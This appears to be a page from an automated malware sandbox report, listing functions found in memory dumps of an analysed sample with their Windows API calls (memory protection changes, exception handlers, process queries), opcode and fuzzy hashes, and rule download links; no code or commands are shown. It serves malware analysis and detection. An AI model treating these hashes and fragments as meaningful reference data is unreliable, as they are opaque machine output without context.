                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00564654, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtProtectVirtualMemory.NTDLL(000000FF,000000C8,000000CC,?,?,?,?,?,?,?,000000EC,?), ref: 00564685
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProtectVirtual
                                        • String ID: E
                                        • API String ID: 2706961497-3568589458
                                        • Opcode ID: 563ce7af520014bae37715cd0a1ca717c43c6b5e51a8cb0f61086050fbf686f5
                                        • Instruction ID: f99834824bd6ac6ecd9f25f3e84313529a01c201b35006b990570d1482581e83
                                        • Opcode Fuzzy Hash: 563ce7af520014bae37715cd0a1ca717c43c6b5e51a8cb0f61086050fbf686f5
                                        • Instruction Fuzzy Hash: DCE0E561408BC41BEB20C2244C1820CAEB81B13369FBC03EDC6B68B0D2CB158846C705
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0056322E, Relevance: 3.1, APIs: 2, Instructions: 86nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • TerminateThread.KERNELBASE(000000FE,00000000), ref: 0056327D
                                        • NtProtectVirtualMemory.NTDLL(000000FF,000000C8,000000CC,?,?,?,?,?,?,?,000000EC,?), ref: 00564685
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProtectTerminateThreadVirtual
                                        • String ID:
                                        • API String ID: 1241109510-0
                                        • Opcode ID: ecaa68a36b21eb74548e30def4e26480395cdb552fb0a6219794400625665396
                                        • Instruction ID: 426f40efad77dc2893df728f42760c863131878f7a759b28ca0d433db5699da0
                                        • Opcode Fuzzy Hash: ecaa68a36b21eb74548e30def4e26480395cdb552fb0a6219794400625665396
                                        • Instruction Fuzzy Hash: 6A210574604302AFEB206E44C9E9BE93E65FF66374F744365ED135B1E1D3A2C8819E12
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00564395, Relevance: 3.0, APIs: 2, Instructions: 50sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Sleep.KERNELBASE(00000005), ref: 00564431
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: c61c794eceb0b6e46a234677604d0efac9d910cc582fdfd017ca6b431611c8e2
                                        • Instruction ID: 2dede24fdbf747a67bfc78fe955cbda00659ae54c9db828def8eb1982b073130
                                        • Opcode Fuzzy Hash: c61c794eceb0b6e46a234677604d0efac9d910cc582fdfd017ca6b431611c8e2
                                        • Instruction Fuzzy Hash: 9B01F5B42443019FEB005E70C8EDBA97AA4BF157A6F668A59ED424B1E2D7B484C0CE11
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005632D1, Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RtlAddVectoredExceptionHandler.NTDLL(?,Function_0000151B), ref: 00563317
                                        • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018,?,?,?,?,?,?,00000000), ref: 005633D8
                                        • NtProtectVirtualMemory.NTDLL(000000FF,000000C8,000000CC,?,?,?,?,?,?,?,000000EC,?), ref: 00564685
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProtectVirtual$ExceptionHandlerVectored
                                        • String ID:
                                        • API String ID: 4193742754-0
                                        • Opcode ID: 20c49e51735291bba0b0a73f34db742c79a6368a7b656bc3be0ac0b8016e5cba
                                        • Instruction ID: f528c260860d0763d63a6870a6cdec6b9d58a778018c1685a7e8b08ef8370d2e
                                        • Opcode Fuzzy Hash: 20c49e51735291bba0b0a73f34db742c79a6368a7b656bc3be0ac0b8016e5cba
                                        • Instruction Fuzzy Hash: 7211C074200301EFD7449F74C88CBD67BA4BF54364FA18644E8908B1A2CBB4DA84CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005697D3, Relevance: 1.6, APIs: 1, Instructions: 141nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00569E23
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID:
                                        • API String ID: 1778838933-0
                                        • Opcode ID: a4179a00439f1473106af5a4de7bf21f8281044648737c07ba9a31f495af294b
                                        • Instruction ID: 7fba9615cce8beb3c0b2b040787a860d6c875d743003437767da3c4685b9273f
                                        • Opcode Fuzzy Hash: a4179a00439f1473106af5a4de7bf21f8281044648737c07ba9a31f495af294b
                                        • Instruction Fuzzy Hash: 8941B130648605CEEF3549A489683F4AE9DBB52354FB94F6FCC53871A4D33588C6EA42
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0056988A, Relevance: 1.6, APIs: 1, Instructions: 126nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtQueryInformationProcess.NTDLL ref: 00569E23
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InformationProcessQuery
                                        • String ID:
                                        • API String ID: 1778838933-0
                                        • Opcode ID: d68e901933556390c7a75ef99fcd895f3a1e9e449f46f5329d1ccb5b63f208e2
                                        • Instruction ID: 5be6104283003e0d96252e513c686ecff1fc6739e15aec03dd77ec6f3eabf74d
                                        • Opcode Fuzzy Hash: d68e901933556390c7a75ef99fcd895f3a1e9e449f46f5329d1ccb5b63f208e2
                                        • Instruction Fuzzy Hash: 52419230608605DEEF3549A4C9687F4AE9DBF52364FA94E5FCC53871A4D33588C2EA82
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0056451B, Relevance: 1.6, APIs: 1, Instructions: 70nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtProtectVirtualMemory.NTDLL(000000FF,000000C8,000000CC,?,?,?,?,?,?,?,000000EC,?), ref: 00564685
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProtectVirtual
                                        • String ID:
                                        • API String ID: 2706961497-0
                                        • Opcode ID: fa56d522c0a7f31000ad054f899bdecd7d9097d73e8d9e53ee5f2734f7159ebe
                                        • Instruction ID: 859acdebe3f89d9ec709f75364d5c98802520e246822cfa7a7083c70ba7135a4
                                        • Opcode Fuzzy Hash: fa56d522c0a7f31000ad054f899bdecd7d9097d73e8d9e53ee5f2734f7159ebe
                                        • Instruction Fuzzy Hash: 1E1106B5604301AFEB205E44C9D5BEA7E65FB17374F744265F9129B1E2C3A1C8809E22
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0056450E, Relevance: 1.6, APIs: 1, Instructions: 69nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 005632C6: RtlAddVectoredExceptionHandler.NTDLL(?,Function_0000151B), ref: 00563317
                                          • Part of subcall function 005632C6: NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018,?,?,?,?,?,?,00000000), ref: 005633D8
                                        • NtProtectVirtualMemory.NTDLL(000000FF,000000C8,000000CC,?,?,?,?,?,?,?,000000EC,?), ref: 00564685
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProtectVirtual$ExceptionHandlerVectored
                                        • String ID:
                                        • API String ID: 4193742754-0
                                        • Opcode ID: 07738a23fceccd392d3115ce05e9de73a257ca594711525b4d2ff21a9307d76b
                                        • Instruction ID: 79602fb3e2d114243219b37f4ba945c5b835c357e84f6baab89b39c229fd19ba
                                        • Opcode Fuzzy Hash: 07738a23fceccd392d3115ce05e9de73a257ca594711525b4d2ff21a9307d76b
                                        • Instruction Fuzzy Hash: 021106B4A04302AFEB205E54C9D9BEA3E65FB17375F644255F9129B1E2C3A1C8808E22
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005644EE, Relevance: 1.6, APIs: 1, Instructions: 68nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 005632C6: RtlAddVectoredExceptionHandler.NTDLL(?,Function_0000151B), ref: 00563317
                                          • Part of subcall function 005632C6: NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018,?,?,?,?,?,?,00000000), ref: 005633D8
                                        • NtProtectVirtualMemory.NTDLL(000000FF,000000C8,000000CC,?,?,?,?,?,?,?,000000EC,?), ref: 00564685
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProtectVirtual$ExceptionHandlerVectored
                                        • String ID:
                                        • API String ID: 4193742754-0
                                        • Opcode ID: 4ddd2c92b70990261e89bbb55106c0631daecc403b5c0903988fcb870e08d33b
                                        • Instruction ID: 2401121d6ccbc1e6c00a404cc2aff08032573426a3efb3f74b37706636bff191
                                        • Opcode Fuzzy Hash: 4ddd2c92b70990261e89bbb55106c0631daecc403b5c0903988fcb870e08d33b
                                        • Instruction Fuzzy Hash: 651129B4A04302AFEB205E54C9D9BEA3E65FB17374F744255FD129B1F2C3A1C8809E22
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0056462E, Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtProtectVirtualMemory.NTDLL(000000FF,000000C8,000000CC,?,?,?,?,?,?,?,000000EC,?), ref: 00564685
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProtectVirtual
                                        • String ID:
                                        • API String ID: 2706961497-0
                                        • Opcode ID: 66cf521ff209e97539f90d4ce6e9c311457942a265a993f132eaf94bdcb5d4cb
                                        • Instruction ID: c6dff423d4a9d2e41e008f2a9c8a91535c3ed6f40bb5d636c4e12d0e717869ff
                                        • Opcode Fuzzy Hash: 66cf521ff209e97539f90d4ce6e9c311457942a265a993f132eaf94bdcb5d4cb
                                        • Instruction Fuzzy Hash: 5BE022B10093414FE3000B18CC197967F64EF173B5F7483AAE8A3DB0E2C329C0068B14
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0056443B, Relevance: 1.5, APIs: 1, Instructions: 26nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 005644CC
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProtectVirtual
                                        • String ID:
                                        • API String ID: 2706961497-0
                                        • Opcode ID: 5fdad7901060c02c21b762d63d8ba5ab0310b2ef3520d018a2020373669c0f45
                                        • Instruction ID: 2d3538e542555866f7e381980b07b984b15940f0bd8180a54a4e0da0f921787a
                                        • Opcode Fuzzy Hash: 5fdad7901060c02c21b762d63d8ba5ab0310b2ef3520d018a2020373669c0f45
                                        • Instruction Fuzzy Hash: C0E022B1500340AFFB101E64CC9DBAD3A98BF103EAF314958F8428B0E5E7B8CAC48E51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005691CF, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00568B7B,?,0056373A,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 005691E8
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProtectVirtual
                                        • String ID:
                                        • API String ID: 2706961497-0
                                        • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                        • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                                        • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                        • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3E9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 3d4143669bf56121ab1058549018bf11846bb2b7bde5e0fcf140fefe55ec85c0
                                        • Instruction ID: 18942b807acc254915c7b78de4a9cac9840f5fe70b254e852201c28d7f370801
                                        • Opcode Fuzzy Hash: 3d4143669bf56121ab1058549018bf11846bb2b7bde5e0fcf140fefe55ec85c0
                                        • Instruction Fuzzy Hash: 33900265601000864140716A884CA0A40057BE16517D2C231E0A88510D859D886576A6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3E9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 6f5aa90c4fde1163df9d3b0cd01729496fd40d5791884164604994c8a34979b9
                                        • Instruction ID: cd2b128d49c6411cd359937003ae9657be47472803a458235b6b77519b4d4330
                                        • Opcode Fuzzy Hash: 6f5aa90c4fde1163df9d3b0cd01729496fd40d5791884164604994c8a34979b9
                                        • Instruction Fuzzy Hash: CF90027520140446D100615A481C70F000557D0742FD2C121E1254515D8669885175B2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3E9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 90b9e6b8f08d09ef9db0928ab95fa49aaace9d452eec4e390a8ec9c53589278a
                                        • Instruction ID: d7120df0c0bff832feb751c2d6cf20db8c34a0f26c3637532aecb1b89763b53f
                                        • Opcode Fuzzy Hash: 90b9e6b8f08d09ef9db0928ab95fa49aaace9d452eec4e390a8ec9c53589278a
                                        • Instruction Fuzzy Hash: E890027520100846D180715A440C74E000557D1741FD2C125E0115614DCA598A5977E2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3E9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: d620945f3e693cf8d05b7a8986f933a5c54ab6b53c7a408285ef10d8ef515b10
                                        • Instruction ID: 3dd0743f8cca69710d495101eb44dbe0d7c3cc4d783647bcdd174005a1f54694
                                        • Opcode Fuzzy Hash: d620945f3e693cf8d05b7a8986f933a5c54ab6b53c7a408285ef10d8ef515b10
                                        • Instruction Fuzzy Hash: 8F90026521180086D200656A4C1CB0B000557D0743FD2C225E0244514CC95988617562
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3E96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: cb1c8d2d5fcb3733ec673507c55813644e377effc53bdebf322cf91ba5284f9b
                                        • Instruction ID: ef5b253acdb7bcb6d85f0a1095bd9f4498dfa1aaff230f2d729c8b345bbe54da
                                        • Opcode Fuzzy Hash: cb1c8d2d5fcb3733ec673507c55813644e377effc53bdebf322cf91ba5284f9b
                                        • Instruction Fuzzy Hash: BC90027520108846D110615A840C74E000557D0741FD6C521E4514618D86D988917162
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3E9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: c0edc678dd3d5412f20d53957556f8b7131a364210a75e2bd36b31d63249d0ff
                                        • Instruction ID: 5fc600a6af3f323a45716e9acb4398a2fcbbb0e08e333fab3749652b2ca3d10d
                                        • Opcode Fuzzy Hash: c0edc678dd3d5412f20d53957556f8b7131a364210a75e2bd36b31d63249d0ff
                                        • Instruction Fuzzy Hash: D690027520100446D100659A540C74A000557E0741FD2D121E5114515EC6A988917172
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3E97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 3956742ed3e9cbb02a74ed11bd24d824239a098825e83590657b4044ea83299f
                                        • Instruction ID: 25bc4bfb324759299ade31a33d5159a6e8e48ae3f7e15096fe26cf15f60d6853
                                        • Opcode Fuzzy Hash: 3956742ed3e9cbb02a74ed11bd24d824239a098825e83590657b4044ea83299f
                                        • Instruction Fuzzy Hash: 5B90026530100047D140715A541C70A4005A7E1741FD2D121E0504514CD95988567263
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3E9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: d16f4fb0795ce0abd0189d26f387d24d5149582027f8353b3ac1fdf1dde9752c
                                        • Instruction ID: 7218c6ae9a9795bd688dc2b845c83eaf637acedee432c69d384e3f0db6ef6955
                                        • Opcode Fuzzy Hash: d16f4fb0795ce0abd0189d26f387d24d5149582027f8353b3ac1fdf1dde9752c
                                        • Instruction Fuzzy Hash: A590026D21300046D180715A540C70E000557D1642FD2D525E0105518CC95988697362
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3E9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 9ea5c7306628ce1d6058e4ddc637eb67d249358dbfd2a1a8833a820a90bb82e1
                                        • Instruction ID: d22d96c8685158c6026a1d134419228c9a8dfbdc279ce50e2382c8d051fda9eb
                                        • Opcode Fuzzy Hash: 9ea5c7306628ce1d6058e4ddc637eb67d249358dbfd2a1a8833a820a90bb82e1
                                        • Instruction Fuzzy Hash: 7490027520100457D111615A450C70B000957D0681FD2C522E0514518D969A8952B162
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3E9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 69e20f55a7cee8b65ebd4758792e5615dea4655f1a47a69fcd8b631bdc609159
                                        • Instruction ID: 43be0823cd91e2b2ff088d531b3c57b0027198cb802e625b1c6a8a73bb32927a
                                        • Opcode Fuzzy Hash: 69e20f55a7cee8b65ebd4758792e5615dea4655f1a47a69fcd8b631bdc609159
                                        • Instruction Fuzzy Hash: AC900265242041965545B15A440C60B400667E06817D2C122E1504910C856A9856F662
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3E98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 1326f8abf98fbe46a941b67f064e7e3e2f74c9e0559b3bfcbb0fbcb1c62aa70d
                                        • Instruction ID: 6eeb228c800cb474f21126f290c8bdf9585a85ca8901061fdf0fa7bbe728e60c
                                        • Opcode Fuzzy Hash: 1326f8abf98fbe46a941b67f064e7e3e2f74c9e0559b3bfcbb0fbcb1c62aa70d
                                        • Instruction Fuzzy Hash: D090026560100546D101715A440C71A000A57D0681FD2C132E1114515ECA698992B172
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3E9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 8b7fe07b8690245136066acd7667b25e5ee4685ba7f8d17408db480af51850b5
                                        • Instruction ID: e848538c7147f08df8a62953956afbeb529c3dc9331f5e3088af2dec7a848549
                                        • Opcode Fuzzy Hash: 8b7fe07b8690245136066acd7667b25e5ee4685ba7f8d17408db480af51850b5
                                        • Instruction Fuzzy Hash: 6E9002B520100446D140715A440C74A000557D0741FD2C121E5154514E869D8DD576A6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3E9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: ed7caeb51d3f096c5f4db7676034fc1b4b44d2d4d003d105f155e246832629e9
                                        • Instruction ID: 3d6bcd29db30a9c90b61d314f917a7bc5ab90e31f4c78ac367c30708842e5934
                                        • Opcode Fuzzy Hash: ed7caeb51d3f096c5f4db7676034fc1b4b44d2d4d003d105f155e246832629e9
                                        • Instruction Fuzzy Hash: 13900269211000470105A55A070C60B004657D57913D2C131F1105510CD66588617162
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3E99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: f87a3d4879f8736d4111da5a72d221364743103b361ee279bc3e818d2f22df1f
                                        • Instruction ID: f8c79112a0a005290d856babf543b472d98c99dbf692046d7d7bee1e16db80aa
                                        • Opcode Fuzzy Hash: f87a3d4879f8736d4111da5a72d221364743103b361ee279bc3e818d2f22df1f
                                        • Instruction Fuzzy Hash: DD9002A534100486D100615A441CB0A000597E1741FD2C125E1154514D865DCC527167
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3E95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: f6de2f58bc787ee59dc09b4e11d17d319e20783fae9a41ede6624d071cc5e8bb
                                        • Instruction ID: 8983f75615fa2ed9070e6cd829f26b482c119897463b970db5b50ed9756d2c42
                                        • Opcode Fuzzy Hash: f6de2f58bc787ee59dc09b4e11d17d319e20783fae9a41ede6624d071cc5e8bb
                                        • Instruction Fuzzy Hash: F29002A5202000474105715A441C71A400A57E0641BD2C131E1104550DC56988917166
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00569F8B, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1314libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: A$E$E$E
                                        • API String ID: 2994545307-2983291346
                                        • Opcode ID: b552ddeaea045296d8abd4831009aa0696efd3103bf69e92d2fa83a94d6f6bb4
                                        • Instruction ID: c81cb4c59ca900b626d954e8ba06d2ce305e147a273d92c1294e8dcf15dd8555
                                        • Opcode Fuzzy Hash: b552ddeaea045296d8abd4831009aa0696efd3103bf69e92d2fa83a94d6f6bb4
                                        • Instruction Fuzzy Hash: 13317A8180DBC41FDB23C7340D69648BF682A23208B5D86CFC9DA8F8E3E7599846C757
                                        Uniqueness

                                        Uniqueness Score: -1.00%

